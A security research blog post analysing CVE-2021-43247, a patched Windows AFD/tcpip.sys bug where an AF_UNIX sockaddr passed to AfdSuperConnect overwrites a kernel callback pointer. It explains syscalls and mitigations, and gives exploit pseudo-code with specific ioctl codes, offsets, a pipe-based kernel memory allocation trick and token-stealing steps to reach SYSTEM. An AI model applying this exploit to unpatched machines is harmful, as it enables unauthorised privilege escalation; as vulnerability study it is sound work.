In this blog post I will go in depth into the inner workings of CVE-2021-43247, which was fixed on the 14th of December 2021.
This bug was classified as “Windows TCP/IP Driver Elevation of Privilege Vulnerability”.
The vulnerability itself was probably dormant for a long time, but became exploitable when the AF_UNIX address family was first introduced in 2019.
I will also take this as an excuse to explain in detail what drivers are, how user space communicates with drivers, what a Local Privilege Escalation (LPE) is and how we can achieve it in this case.
The goal / what is an LPE (Local Privilege Escalation)
A Local Privilege Escalation (sometimes also called Elevation of Privilege or EoP) is an exploit which obtains some privilege that it is not supposed to be able to get. In the traditional cases (as in this one) this means we start out with a normal user shell and end up with administrator access. On Linux the equivalent would be obtaining a root shell. This is usually done through a bug in a privileged process, a bug in a driver or a bug in the operating system itself.
As the CVE description tells us, we are dealing with a bug in the TCP/IP driver.
What are drivers and how does user space communicate with them?
Drivers are simply PE files, which the kernel loads into the kernel address space. PE (Portable Executable) is the executable file format used by Windows; it is used by “.exe” and “.dll” files. Drivers usually have the file extension “.sys”, but there are also library drivers which get the “.dll” file extension. Most drivers are contained in the “C:\windows\system32\drivers” directory. Which drivers are loaded on system startup is determined by the registry and the physical devices available to the system.
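To make the "drivers are just PE files" point concrete, here is a minimal sketch in portable C that checks whether a byte buffer starts like a PE image: the "MZ" magic of the DOS header, and the "PE\0\0" signature at the file offset stored at 0x3c. The function name looks_like_pe is made up for this illustration, and the check is far from a full parser.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Returns 1 if `image` (of `size` bytes) starts like a PE file, else 0.
 * Hypothetical helper for illustration; it only checks the two signatures. */
int looks_like_pe(const unsigned char *image, size_t size)
{
    uint32_t e_lfanew;

    /* The DOS header is 0x40 bytes long and starts with the ASCII magic "MZ". */
    if (size < 0x40 || image[0] != 'M' || image[1] != 'Z')
        return 0;

    /* The little-endian 32-bit field at offset 0x3c holds the file offset
     * of the PE header. */
    e_lfanew = (uint32_t)image[0x3c] | ((uint32_t)image[0x3d] << 8) |
               ((uint32_t)image[0x3e] << 16) | ((uint32_t)image[0x3f] << 24);

    /* The 4-byte signature must lie completely inside the buffer. */
    if (e_lfanew > size || size - e_lfanew < 4)
        return 0;

    return memcmp(image + e_lfanew, "PE\0\0", 4) == 0;
}
```

Reading a “.sys” file from the drivers directory into a buffer and passing it to this function should return 1, exactly as it would for an “.exe” or “.dll”.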
User space can communicate with the loaded drivers using kernel system calls (or syscalls for short). For example, consider the following program:
// blog_socket.c - small example program used in this blog
#include <winsock.h>
int main() {
    // Initialize WinSock
    WSAStartup(MAKEWORD(2, 2), &(WSADATA){0});
    // Create a TCP/IPv4 socket.
    SOCKET Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    // Bind the socket to any address
    bind(Socket, &(struct sockaddr){AF_INET}, sizeof(struct sockaddr));
}
When it calls socket, we can observe the following call stack:
00 ntdll!NtCreateFile
01 mswsock!SockSocket+0x56e
02 mswsock!WSPSocket+0x23a
03 WS2_32!WSASocketW+0x130
04 WS2_32!socket+0x6e
05 blog_socket!main+0x84
ntdll!NtCreateFile is the function that actually transitions into the kernel address space.
The assembly for all ntdll!NtXxx functions looks something like the following:
NtCreateFile:
    mov r10, rcx  ; load the first argument into r10, as the syscall
                  ; instruction uses rcx as the return location
    mov eax, 0x55 ; load the syscall value into eax (0x55 is 'NtCreateFile')
    test byte ptr [.Running32Bit], 1 ; check if we are running a 32bit executable
    jnz .Syscallx86
    ; syscall transitions into the kernel.
    syscall
    ret
.Syscallx86:
    ; x86 does not have a syscall instruction, use int 0x2e instead of syscall.
    int 0x2e
    ret
We will only focus on the x64 case here. The syscall instruction loads the new instruction pointer from a specialized hardware register (called a model specific register or MSR), namely the MSR IA32_LSTAR.
It also stores the return address (in this case the address of the ret instruction) into rcx and sets the privilege level of the processor to 0. This is why kernel mode is sometimes referred to as ring 0.
When the processor is running at privilege level 0, it can access kernel space memory.
Here it is important to know that the address space does not change, but at non-zero privilege level the processor faults when it is accessing a page which does not have the USER bit set in the page table.
In Windows 10 the IA32_LSTAR MSR points to the function nt!KiSystemCall64, which first establishes a stack pointer:
KiSystemCall64:
    swapgs                        ; load saved kernel thread locals from some MSR
    mov gs:[gs.user_stack], rsp   ; save user stack, in the kernel thread locals
    mov rsp, gs:[gs.kernel_stack] ; load kernel space stack, from the thread locals
    ; ... from here we are just in kernel space, and can do whatever we want
    ;     e.g. Save all the registers and then call the according NtXxx
    ;     kernel function depending on eax.
The kernel then figures out what kernel function was requested by looking at eax and transitions to it.
In this case we end up in nt!NtCreateFile (on the kernel side).
00 nt!NtCreateFile <-- Kernel space function
01 nt!KiSystemServiceCopyEnd+0x25
02 ntdll!NtCreateFile+0x14 <-- User space function
03 mswsock!SockSocket+0x4ec
04 mswsock!WSPSocket+0x233
05 WS2_32!WSASocketW+0x1be
06 WS2_32!socket+0x9b
Note that the address space is still the same as in user space; the difference is that we are now allowed to access kernel memory. The arguments to nt!NtCreateFile are unchanged from the arguments ntdll!NtCreateFile received. The kernel very carefully validates all arguments and copies them safely to kernel space memory.
In this case “mswsock.dll” tries to open a HANDLE to AFD or the “Ancillary Function Driver for WinSock”.
AFD
AFD is located at “C:\windows\system32\drivers\afd.sys” and provides implementations for the usual socket functions.
As I have hopefully been able to convince you, the socket function corresponds to opening a HANDLE to AFD using NtCreateFile.
Using the HANDLE returned by NtCreateFile, communication occurs via NtDeviceIoControlFile:
__kernel_entry NTSTATUS NtDeviceIoControlFile(
    [in]  HANDLE           FileHandle,
    [in]  HANDLE           Event,
    [in]  PIO_APC_ROUTINE  ApcRoutine,
    [in]  PVOID            ApcContext,
    [out] PIO_STATUS_BLOCK IoStatusBlock,
    [in]  ULONG            IoControlCode,
    [in]  PVOID            InputBuffer,
    [in]  ULONG            InputBufferLength,
    [out] PVOID            OutputBuffer,
    [in]  ULONG            OutputBufferLength
);
Here, each different socket function corresponds to an IoControlCode, or ioctl for short.
For example, if we bind the socket we end up in afd!AfdBind:
00 afd!AfdBind
01 afd!AfdDispatchDeviceControl+0x7d
02 nt!IofCallDriver+0x59
03 nt!IopSynchronousServiceTail+0x1b1
04 nt!IopXxxControlFile+0xe0c
05 nt!NtDeviceIoControlFile+0x56
06 nt!KiSystemServiceCopyEnd+0x25
07 ntdll!NtDeviceIoControlFile+0x14
08 mswsock!WSPBind+0x278
09 WS2_32!bind+0xdf
0a blog_socket!main+0x137
Similarly, recv corresponds to AfdReceive, send corresponds to AfdSend and so on.
The arguments and return values of these functions are serialized into the InputBuffer and OutputBuffer, respectively.
The Bug
The bug combines three different features that Windows 10 provides: the TCP_FASTOPEN option, the ConnectEx/AfdSuperConnect function and the AF_UNIX address family.
TCP_FASTOPEN
According to Wikipedia, the TCP_FASTOPEN option allows the client under certain conditions to start sending data to the host without waiting for the ACK packet. For us, what it does is not important, only that it is necessary in order to call AfdSuperConnect later on.
AF_UNIX
As mentioned by this blog, the vulnerability probably turned exploitable when Windows started supporting sockets of type AF_UNIX.
AF_UNIX sockets provide a means of inter-process communication. For us the important fact is that the associated sockaddr looks like this:
#define UNIX_PATH_MAX 108
typedef struct sockaddr_un
{
    ADDRESS_FAMILY sun_family;    /* AF_UNIX */
    char sun_path[UNIX_PATH_MAX]; /* pathname */
} SOCKADDR_UN, *PSOCKADDR_UN;
With a size of 110 = 0x6e bytes, this structure is therefore quite large.
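The size can be double-checked with a small portable sketch. It assumes that ADDRESS_FAMILY is a 16-bit unsigned integer (as it is in the Windows headers) and uses the stand-in names address_family_t and sockaddr_un_like, which are not part of any real header.

```c
#include <stddef.h>
#include <stdint.h>

#define UNIX_PATH_MAX 108

/* Assumption: ADDRESS_FAMILY is a 16-bit unsigned integer. */
typedef uint16_t address_family_t;

/* Portable stand-in for SOCKADDR_UN with the same member layout. */
struct sockaddr_un_like {
    address_family_t sun_family;  /* AF_UNIX */
    char sun_path[UNIX_PATH_MAX]; /* pathname */
};

/* 2 bytes of family + 108 bytes of path, no padding needed. */
size_t sockaddr_un_size(void)
{
    return sizeof(struct sockaddr_un_like);
}
```

Calling sockaddr_un_size() yields 110, i.e. 0x6e, matching the number above.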
ConnectEx
The ConnectEx function is a Microsoft specific extension, which can be queried using WSAIoctl.
The underlying kernel function is AfdSuperConnect.
Sadly, the user space API validates the arguments to ConnectEx and therefore we are forced to call it using NtDeviceIoControlFile directly.
The socket functions do not expose the underlying handles to AFD. This forces us to use NtCreateFile and NtDeviceIoControlFile directly for all communication with AFD.
AfdSuperConnect gets invoked when using NtDeviceIoControlFile with the ioctl 0x120c7.
The input buffer for this call consists of 10 bytes, most of which seem to be unused, followed by any sockaddr.
The vulnerability occurs when AfdSuperConnect attempts to connect to a sockaddr of type AF_UNIX.
The Setup
- Create an AF_INET socket using NtCreateFile.
- Enable the TCP_FASTOPEN option using AfdTliIoControl (NtDeviceIoControlFile with ioctl 0x120bf).
- Bind the socket to any address using AfdBind (NtDeviceIoControlFile with ioctl 0x12003).
- Trigger the vulnerability by using AfdSuperConnect (NtDeviceIoControlFile with ioctl 0x120c7), passing a sockaddr of type AF_UNIX.
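The three ioctl values used in these steps are not arbitrary. The following sketch decodes them under the assumption that AFD builds its control codes as (0x12 << 12) | (request << 2) | method, which is the layout found in the ReactOS AFD headers; Microsoft does not document it, and the names afd_ioctl and decode_afd_ioctl are made up here.

```c
#include <stdint.h>

/* Decoded parts of an AFD control code (hypothetical helper type). */
struct afd_ioctl {
    uint32_t device;  /* 0x12 is FILE_DEVICE_NETWORK */
    uint32_t request; /* index of the AFD request */
    uint32_t method;  /* 3 is METHOD_NEITHER */
};

/* Assumed layout: (device << 12) | (request << 2) | method. */
struct afd_ioctl decode_afd_ioctl(uint32_t code)
{
    struct afd_ioctl out;
    out.device  = code >> 12;
    out.request = (code >> 2) & 0x3ff;
    out.method  = code & 0x3;
    return out;
}
```

Under that assumption, 0x12003 decodes to request 0, 0x120bf to request 0x2f and 0x120c7 to request 0x31, all with method 3 (METHOD_NEITHER), which means the kernel hands the raw user space buffer pointers to the driver.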
As we opened the socket as an AF_INET socket, the call to AfdSuperConnect ends up in tcpip!TcpTlProviderConnectAndSend.
00 tcpip!TcpTlProviderConnectAndSend
01 afd!AfdSuperConnect+0x10b26
02 afd!AfdDispatchDeviceControl+0x7d
03 nt!IofCallDriver+0x59
04 nt!IopSynchronousServiceTail+0x1b1
05 nt!IopXxxControlFile+0xe0c
06 nt!NtDeviceIoControlFile+0x56
tcpip!TcpCreateConnectTcb checks early on whether the TCP_FASTOPEN option is enabled and, if it is not, returns with the error code STATUS_RETRY.
If it is, it allocates a big internal structure and later on copies the sockaddr we provided into the internal structure.
// Ghidra Decompilation from (tcpip!TcpCreateConnectTcb)
SockaddrFamily = *TlConnect->ConnectSockaddr;
if (SockaddrFamily < 0x23) {
    sockaddr_size = (&::sockaddr_size)[SockaddrFamily];
}
/* this is where the magic happens */
memcpy(&_Dst->contains_the_function_pointer->sockaddr,
       TlConnect->ConnectSockaddr, sockaddr_size);
Crucially, as this is all happening in “tcpip.sys”, the code only expects a sockaddr of type AF_INET or AF_INET6, which are of size 0x1c and 0x24, respectively.
Hence, tcpip only reserves 0x24 bytes of memory for said sockaddr and we can overwrite 0x6e - 0x24 = 0x4a bytes after the space reserved for the sockaddr.
Fortunately for us, this range of bytes contains a callback function pointer (originally pointing to afd!AfdTLBufferedSendComplete) and its callback context argument.
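The effect of the copy can be reproduced in user mode with a toy model. This is only a sketch: fake_tcb is a flat byte array standing in for the real (undocumented) kernel structure, the size table only contains the three sizes quoted in this post, the family values 1, 2 and 23 are the usual Windows values of AF_UNIX, AF_INET and AF_INET6, and the offsets 0x5c and 0x64 are the ones used in the pseudo-code at the end of the post.

```c
#include <stdint.h>
#include <string.h>

#define AF_UNIX_FAMILY   1    /* assumed value of AF_UNIX */
#define UNIX_SOCKADDR_SZ 0x6e /* sizeof(struct sockaddr_un) */
#define CALLBACK_OFFSET  0x5c /* callback pointer, relative to the sockaddr */
#define CONTEXT_OFFSET   0x64 /* callback context, relative to the sockaddr */

/* Toy stand-in: the first 0x24 bytes are "reserved" for the sockaddr,
 * everything after that belongs to other fields of the object. */
struct fake_tcb {
    unsigned char bytes[0x80];
};

/* Hypothetical per-family size table, indexed like the decompiled one. */
static const size_t size_table[0x23] = {
    [AF_UNIX_FAMILY] = UNIX_SOCKADDR_SZ,
    [2]  = 0x1c, /* AF_INET, size as quoted in the text */
    [23] = 0x24, /* AF_INET6, size as quoted in the text */
};

/* Mirrors the decompilation: the size depends only on the family and is
 * never compared against the 0x24 bytes that were reserved. */
void vulnerable_copy(struct fake_tcb *tcb, const unsigned char *sockaddr)
{
    uint16_t family;
    size_t size = 0;

    memcpy(&family, sockaddr, sizeof family);
    if (family < 0x23)
        size = size_table[family];
    memcpy(tcb->bytes, sockaddr, size);
}

/* Reads a 64-bit field of the toy object at the given byte offset. */
uint64_t field_at(const struct fake_tcb *tcb, size_t offset)
{
    uint64_t value;
    memcpy(&value, tcb->bytes + offset, sizeof value);
    return value;
}
```

Filling a 0x6e byte buffer with the family AF_UNIX and placing two chosen 64-bit values at offsets 0x5c and 0x64 replaces both the "callback" and the "context" of the toy object after vulnerable_copy.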
Prior to the vulnerable memcpy:
kd> dq rax + f8 L2
ffffac8e`6702a138 fffff806`2d0db540 ffffac8e`6841c9e0
kd> ln fffff806`2d0db540
(fffff806`2d0db540) afd!AfdTLBufferedSendComplete
After the vulnerable memcpy:
kd> dq ffffac8e`6702a138 L2
ffffac8e`6702a138 13371337`13371337 deaddead`deaddead
The call to tcpip!TcpTlProviderConnectAndSend eventually fails, returning a status code of STATUS_INVALID_ADDRESS_COMPONENT, but not before trying to “complete” the request by calling the callback function pointer, passing its callback context as the first argument.
Breakpoint 3 hit
tcpip!guard_dispatch_icall_nop:
fffff803`11e36490 ffe0 jmp rax
kd> r rax, rcx
rax=1337133713371337 rcx=deaddeaddeaddead
kd> k
# Child-SP RetAddr Call Site
00 ffffeb0f`32dc18e8 fffff803`11d767fd tcpip!guard_dispatch_icall_nop
01 ffffeb0f`32dc18f0 fffff803`11d73840 tcpip!TcpCreateAndConnectTcbComplete+0xc39
02 ffffeb0f`32dc1b30 fffff803`11d88e2a tcpip!TcpShutdownTcb+0x1040
03 ffffeb0f`32dc1f20 fffff803`11d88d38 tcpip!TcpCreateAndConnectTcbInspectConnectComplete+0xba
04 ffffeb0f`32dc2000 fffff803`11d87be8 tcpip!TcpContinueCreateAndConnect+0x1044
05 ffffeb0f`32dc2220 fffff803`11d87998 tcpip!TcpCreateAndConnectTcbInspectConnectRequestComplete+0x118
06 ffffeb0f`32dc2330 fffff803`11d8709d tcpip!TcpCreateAndConnectTcbWorkQueueRoutine+0x8a8
07 ffffeb0f`32dc2450 fffff803`11ea2247 tcpip!TcpCreateAndConnectTcb+0xcb5
08 ffffeb0f`32dc25d0 fffff803`11995606 tcpip!TcpTlProviderConnectAndSend+0x17
09 ffffeb0f`32dc2600 fffff803`1198958d afd!AfdSuperConnect+0x10b26
Exploitability, Mitigations and Complications
As we have seen, the vulnerability gives us full control of the instruction pointer rip and the first argument rcx, and does so by calling into a function pointer we can freely choose.
A vulnerability this good is almost always exploitable. But we first have to jump through some hoops…
SMEP (Supervisor Mode Execution Prevention)
The simplest idea to exploit a bug of this kind would be to set the instruction pointer to a user space address, i.e. write some shellcode that, when executed in kernel mode, will elevate the permissions of the current process.
Sadly, Intel thought of this long ago and introduced SMEP.
SMEP uses the fact that user pages have the USER flag set in the page tables to throw an exception when the kernel executes code at any user address.
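As a rough model of that rule, the following sketch decides whether an instruction fetch faults. The bit positions are the architectural ones (present bit 0 and user/supervisor bit 2 of a page table entry, SMEP bit 20 of CR4), but the function fetch_faults is an illustration only: it looks at a single page table entry and ignores everything else the processor checks, such as the no-execute bit.

```c
#include <stdint.h>

#define PTE_PRESENT (1ull << 0)  /* page is mapped */
#define PTE_USER    (1ull << 2)  /* the USER (U/S) bit */
#define CR4_SMEP    (1ull << 20) /* SMEP enable bit in CR4 */

/* Returns 1 if fetching an instruction from a page described by `pte`
 * faults at privilege level `cpl` (0 = kernel, 3 = user), else 0. */
int fetch_faults(uint64_t pte, int cpl, uint64_t cr4)
{
    if (!(pte & PTE_PRESENT))
        return 1; /* not mapped at all */
    if (cpl == 3 && !(pte & PTE_USER))
        return 1; /* user mode touching a kernel page */
    if (cpl < 3 && (pte & PTE_USER) && (cr4 & CR4_SMEP))
        return 1; /* SMEP: kernel executing a user page */
    return 0;
}
```

With SMEP enabled, the kernel jumping to our user space shellcode corresponds to fetch_faults(PTE_PRESENT | PTE_USER, 0, CR4_SMEP), which faults; without the CR4 bit the same fetch would succeed.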
ASLR (Address Space Layout Randomization)
Okay, so just executing user space code is out of the question, but what if we first load our shellcode into the kernel? First off, though it sounds hard, it is actually really easy to allocate arbitrary rwx-memory in kernel space using pipes:
char rwx_memory[0x100] = { <my_shellcode> }; // cannot contain zeroes
char output[0x100];     // output buffer, the size is an arbitrary choice here
IO_STATUS_BLOCK status;
HANDLE read_pipe;
HANDLE write_pipe;
CreatePipe(&read_pipe, &write_pipe, NULL, 0);
// ends up in 'NpSetAttribute'
NtFsControlFile(write_pipe, NULL, NULL, NULL, &status, 0x11003C,
                rwx_memory, sizeof(rwx_memory), output, sizeof(output));
But as far as I know, there is no way for us to know where this allocation will end up (without another exploit or administrator privileges which would defeat the purpose). Even if we could control the heap perfectly we do not know where the heap starts. This is because of ASLR (Address Space Layout Randomization). At system startup, Windows randomizes all addresses it will use during runtime.
So…? Can we somehow get or leak addresses (or pointers) from the kernel? Fortunately, Windows is very nice to us in this respect.
There is a user space function called NtQuerySystemInformation, which can be used to retrieve a lot of different kinds of information depending on an InformationClass.
The InformationClass we are interested in is SystemModuleInformation. Using it, we can obtain the loaded base address of every currently running driver on the system, including the kernel (ntoskrnl.exe) itself.
By parsing the images contained on disk and using these base addresses, we know the address of every exported kernel function. One could go one step further and look at all symbols using the public symbols (.pdb) provided by Microsoft, but for our purposes restricting the search to exported functions was enough.
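The arithmetic behind this is simple, because the export table of a PE image stores each function as an offset relative to the image base (an RVA). The sketch below assumes the export table has already been parsed into name/RVA pairs; export_entry and resolve_export are hypothetical names, and the actual parsing of the image on disk is left out.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* One parsed export: its name and its offset from the image base. */
struct export_entry {
    const char *name;
    uint32_t    rva;
};

/* Returns the runtime address of `name`, given the base address the
 * module was loaded at, or 0 if the export is not in the list. */
uint64_t resolve_export(const struct export_entry *exports, size_t count,
                        const char *name, uint64_t loaded_base)
{
    for (size_t i = 0; i < count; i++) {
        if (strcmp(exports[i].name, name) == 0)
            return loaded_base + exports[i].rva;
    }
    return 0;
}
```

Here loaded_base would come from SystemModuleInformation and the list of exports from the copy of the driver on disk.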
CFG (Control Flow Guard)
Okay, the plan is to call exported kernel functions, but there (potentially) is one more obstacle in our way: the CFG (Control Flow Guard) mitigation.
I did not emphasize this above, but looking at the call stack to the vulnerable call we can see that we are inside of a function called guard_dispatch_icall_nop.
This means that Control Flow Guard is disabled. If it were enabled we would instead be inside nt!guard_dispatch_icall.
nt!guard_dispatch_icall checks whether the address we are jumping to is registered as a CFG target. If the target is not registered, nt!guard_dispatch_icall crashes the system (mitigating the exploit).
This registration happens when the driver is loaded. The binary contains information on which functions are valid CFG targets.
You can also view the CFG information using dumpbin:
> dumpbin /loadconfig C:\windows\system32\ntoskrnl.exe
Microsoft (R) COFF/PE Dumper Version 14.28.29336.0
Copyright (C) Microsoft Corporation. All rights reserved.
Dump of file C:\windows\system32\ntoskrnl.exe
File Type: EXECUTABLE IMAGE
Section contains the following load config:
<...>
Guard CF Function Table
Address
--------
0000000140200010
E 0000000140200050
00000001402000B0
00000001402001A0
E 0000000140200580
E 0000000140200940
E 00000001402009F0
0000000140200C40
00000001402010B0
00000001402010E0
0000000140201200
E 0000000140201750
E 0000000140201770
.
.
.
Therefore, if the exploit is supposed to work even if CFG is enabled, we need to choose our target function from the valid CFG targets.
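Conceptually, the check is a bitmap lookup. The following toy model registers targets relative to an image base and rejects everything else. It is deliberately simplified and is not how Windows lays out its bitmap: one bit per 16 byte slot, a fixed number of slots, and the made-up names toy_cfg, cfg_register and cfg_is_valid.

```c
#include <stdint.h>

#define SLOT_SHIFT 4    /* toy granularity: one bit per 16 bytes */
#define SLOTS      1024 /* toy image size: 1024 slots = 16 KiB */

struct toy_cfg {
    uint64_t image_base;
    uint8_t  bitmap[SLOTS / 8];
};

/* Marks `target` as a valid indirect call target (done at load time). */
void cfg_register(struct toy_cfg *cfg, uint64_t target)
{
    uint64_t slot = (target - cfg->image_base) >> SLOT_SHIFT;
    if (slot < SLOTS)
        cfg->bitmap[slot / 8] |= (uint8_t)(1u << (slot % 8));
}

/* Returns 1 if an indirect call to `target` would be allowed. */
int cfg_is_valid(const struct toy_cfg *cfg, uint64_t target)
{
    uint64_t slot;

    if (target < cfg->image_base || (target & 0xf))
        return 0; /* outside the image or not slot aligned */
    slot = (target - cfg->image_base) >> SLOT_SHIFT;
    if (slot >= SLOTS)
        return 0;
    return (cfg->bitmap[slot / 8] >> (slot % 8)) & 1;
}
```

In this model, an overwritten callback pointer only survives the check if it points at the start of a registered function, which is why the choice of target function matters.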
IRQL (Interrupt Request Level)
One last detail that bears mentioning is the Interrupt Request Level (IRQL). The Interrupt Request Level is a hardware feature that allows threads to specify what interrupts they are willing to accept. Importantly, if the IRQL is 2 or higher, the thread is not allowed to page-fault anymore. This means that when the IRQL is at least two, the thread cannot access pageable memory anymore.
Pageable memory is memory that the Windows kernel reserves the right to spill to disk if the system is running low on memory. If a thread then accesses that memory, a page fault occurs and the Windows kernel reloads the page from disk.
Why is all this important? Well, it just so happens that the function we are overwriting is a “Completion Routine”. Completion Routines are supposed to run at IRQL = 2 and therefore might crash the system whenever they are accessing paged memory. All user space memory is paged and thus the exploit might crash when accessing user space memory. Further, not all kernel space functions are non-paged (though most are), further restricting the set of functions we can use in the exploit.
In reality, we are only interested in providing a proof of concept, so one could just ignore the fact that the exploit crashes sometimes, but we actually have a solution:
Sometimes, when the kernel uses a piece of user space memory, it uses so-called Memory Descriptor Lists (MDLs). When such a list is “locked”, the kernel will never page out the memory. Therefore, we just have to make some request that will “lock” an MDL for the user space memory we are using, and then we can reliably use it at IRQL = 2.
Primitives
So, we have control over rip and rcx and can call some exported kernel functions, but what is the plan?
Roughly, we want to obtain exploit primitives which allow us to read and write kernel memory:
u64 read_u64(u64 kernel_address);
void write_u64(u64 kernel_address, u64 value);
These will later be used to give our process administrator privileges using a generalized exploit algorithm.
We construct these primitives by using the vulnerability with an exported kernel function. The perfect kernel function for a read primitive would look something like this:
void read_function(struct read_argument *read){
    read->value = read->pointer->value;
}
And the perfect write function would look something like this:
void write_function(struct write_argument *write){
    *write->pointer = write->value;
}
Here the read/write argument would be a pointer to user space memory. This means we have full control of the value of read->pointer and write->pointer, respectively.
These pointers then get dereferenced: the write function stores the controlled write->value at the target, while the read function loads from the target and stores the result back into user space memory.
If one cannot find primitives as perfect as these, one can search for functions that spread the first argument. The perfect spread function would be something like:
void spread_function(struct arguments *arguments){
    (*arguments->function)(arguments->argument_1, arguments->argument_2,
                           arguments->argument_3, arguments->argument_4);
}
Using the perfect spread function one could obtain a read/write function as follows:
void read_write_function_called_by_spread_function(
        struct argument_1 *arg_1, struct argument_2 *arg_2){
    arg_1->value = arg_2->value;
}
In practice, we used two spread functions and then different read and write functions.
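How the primitives sit on top of "call a chosen function with a chosen first argument" can be modelled in plain C. In this sketch trigger is a stand-in for the vulnerability (it simply calls the callback with its context), read_function and write_function are the idealized gadgets from above written as ordinary functions, and ordinary pointers play the role of kernel addresses. None of this touches the kernel.

```c
#include <stdint.h>

struct read_argument  { const uint64_t *pointer; uint64_t value; };
struct write_argument { uint64_t *pointer; uint64_t value; };

/* Idealized gadgets: each only receives a single pointer argument. */
static void read_function(void *context)
{
    struct read_argument *read = context;
    read->value = *read->pointer;
}

static void write_function(void *context)
{
    struct write_argument *write = context;
    *write->pointer = write->value;
}

/* Stand-in for the bug: "the kernel" calls callback(context) for us. */
static void trigger(void (*callback)(void *), void *context)
{
    callback(context);
}

uint64_t read_u64(const uint64_t *address)
{
    struct read_argument argument = { address, 0 };
    trigger(read_function, &argument);
    return argument.value;
}

void write_u64(uint64_t *address, uint64_t value)
{
    struct write_argument argument = { address, value };
    trigger(write_function, &argument);
}
```

The important property is that the argument structures live in memory we control, so each trigger turns one controlled call into one controlled 8 byte read or write.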
Windows Exploitation tricks and the general exploit algorithm
The exploitation algorithm we are using is called “Token Stealing”. You can find a lot of information on it online, but we will give a short overview.
Every process has an internal _EPROCESS kernel structure. The access rights of the process are contained in an internal kernel structure called _TOKEN.
The _EPROCESS structure references this token by pointer.
kd> dt nt!_EPROCESS Token
+0x358 Token : _EX_FAST_REF
kd> dt nt!_EX_FAST_REF
+0x000 Object : Ptr64 Void
+0x000 RefCnt : Pos 0, 4 Bits
+0x000 Value : Uint8B
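The layout above says that the lowest 4 bits of the stored value are a reference count that shares the same 8 bytes as the pointer. A small sketch of how such a value splits into its two parts (the helper names are made up for this example):

```c
#include <stdint.h>

#define EX_FAST_REF_REFCNT_MASK 0xfull /* RefCnt : Pos 0, 4 Bits */

/* The object pointer is the value with the reference count bits cleared. */
uint64_t fast_ref_object(uint64_t value)
{
    return value & ~EX_FAST_REF_REFCNT_MASK;
}

/* The cached reference count lives in the low 4 bits. */
unsigned fast_ref_count(uint64_t value)
{
    return (unsigned)(value & EX_FAST_REF_REFCNT_MASK);
}
```

This matters when comparing a raw Token field against a known _TOKEN address: the two only match once the low 4 bits are masked off.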
Now, if we control the _TOKEN, we have control of all access rights.
One option would be to use the read and write primitive to directly alter the access token, but in this case there is a simpler way.
If we can locate a process which has SYSTEM access rights, we can simply copy the _TOKEN-pointer of the SYSTEM process into the _EPROCESS->Token of our process.
And it just so happens that the kernel exports a pointer to the nt!PsInitialSystemProcess, which has SYSTEM access rights.
Therefore, the basic algorithm would be:
- Use the read primitive to read the value of (nt!PsInitialSystemProcess)->Token.
- Use the write primitive to write the value to our _EPROCESS->Token field.
But two problems remain:
- As the _EPROCESS structure is undocumented and subject to change, the offset of the Token field varies by kernel version.
- We do not know where our _EPROCESS structure is.
This is where Windows is really helpful again. Just as we can find all base addresses of kernel modules using NtQuerySystemInformation(SystemModuleInformation), we can find the address of both our _EPROCESS structure (solving the second problem) and our _TOKEN structure using NtQuerySystemInformation(SystemHandleInformation).
Now, using the read primitive, we can iterate through our _EPROCESS structure and locate the pointer to the _TOKEN structure.
This then gives us the offset of the Token field (solving the first problem).
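The scan itself is a plain linear search. The sketch below runs it over an array of 64-bit values standing in for the memory of our _EPROCESS; in the real exploit each element would be fetched with the read primitive instead. The function name find_token_offset is made up, and the masking of the low 4 bits is there because the Token field is an _EX_FAST_REF.

```c
#include <stddef.h>
#include <stdint.h>

/* Returns the byte offset of the first 8-byte slot in `process` that
 * references `token`, or -1 if none of the `slots` entries match. */
long find_token_offset(const uint64_t *process, size_t slots, uint64_t token)
{
    for (size_t i = 0; i < slots; i++) {
        /* Ignore the 4 reference count bits of the _EX_FAST_REF. */
        if ((process[i] & ~0xfull) == token)
            return (long)(i * sizeof(uint64_t));
    }
    return -1;
}
```

For the kernel version shown in the debugger output above, this search would be expected to come back with 0x358.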
Putting it all together in pseudo-code, it looks something like this:
// Use the Windows API to get all the information we want.
token, process := find_token_and_process_using_NtQuerySystemInformation();
PsInitialSystemProcess_export, read_function, write_function :=
find_exported_symbols_using_NtQuerySystemInformation();
// Use a system call that is more or less equivalent to
// `socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)`
socket_handle := NtCreateFile("\\Device\\Afd", EaBuffer = {AF_INET, SOCK_STREAM, IPPROTO_TCP});
// use the system call that is equivalent to
// `setsockopt(socket, IPPROTO_TCP, TCP_FASTOPEN, &(u32){1}, 1)`
NtDeviceIoControlFile(socket_handle, 0x120bf, .input_buffer = {SetSockOpt, .level = IPPROTO_TCP, .option = TCP_FASTOPEN, .optval = &(u32){1}, .optlen = 1});
// use the system call that is equivalent to
// `bind(socket, &(struct sockaddr){AF_INET}, sizeof(struct sockaddr))`
NtDeviceIoControlFile(socket_handle, 0x12003, ...);
// The read and write primitives now work by triggering the vulnerability by calling
// `AfdSuperConnect` through the `NtDeviceIoControlFile`.
function u64 read_u64(u64 address):
    read_argument := {.pointer = address};
    NtDeviceIoControlFile(socket_handle, 0x120c7, .input_buffer = {.sockaddr = {AF_UNIX, .offset_0x5c = read_function, .offset_0x64 = &read_argument}});
    return read_argument.value;
function void write_u64(u64 address, u64 value):
    write_argument := {.pointer = address, .value = value};
    NtDeviceIoControlFile(socket_handle, 0x120c7, .input_buffer = {.sockaddr = {AF_UNIX, .offset_0x5c = write_function, .offset_0x64 = &write_argument}});
// figure out the token_offset, by linearly scanning through our `_EPROCESS`
for i from 0 to 0x1000:
    maybe_token := read_u64(process + i * 8);
    // the Token field is an `_EX_FAST_REF`: ignore the 4 reference count bits
    if (maybe_token & ~0xf) == token:
        token_offset = i * 8;
        break;
// figure out the `_TOKEN` of `nt!PsInitialSystemProcess`
PsInitialSystemProcess = read_u64(PsInitialSystemProcess_export);
PsInitialSystemProcessToken = read_u64(PsInitialSystemProcess + token_offset);
// actually steal the access `_TOKEN` to give us complete access rights.
write_u64(process + token_offset, PsInitialSystemProcessToken);
// spawn a shell to keep the access rights in a clean way.
spawn_shell();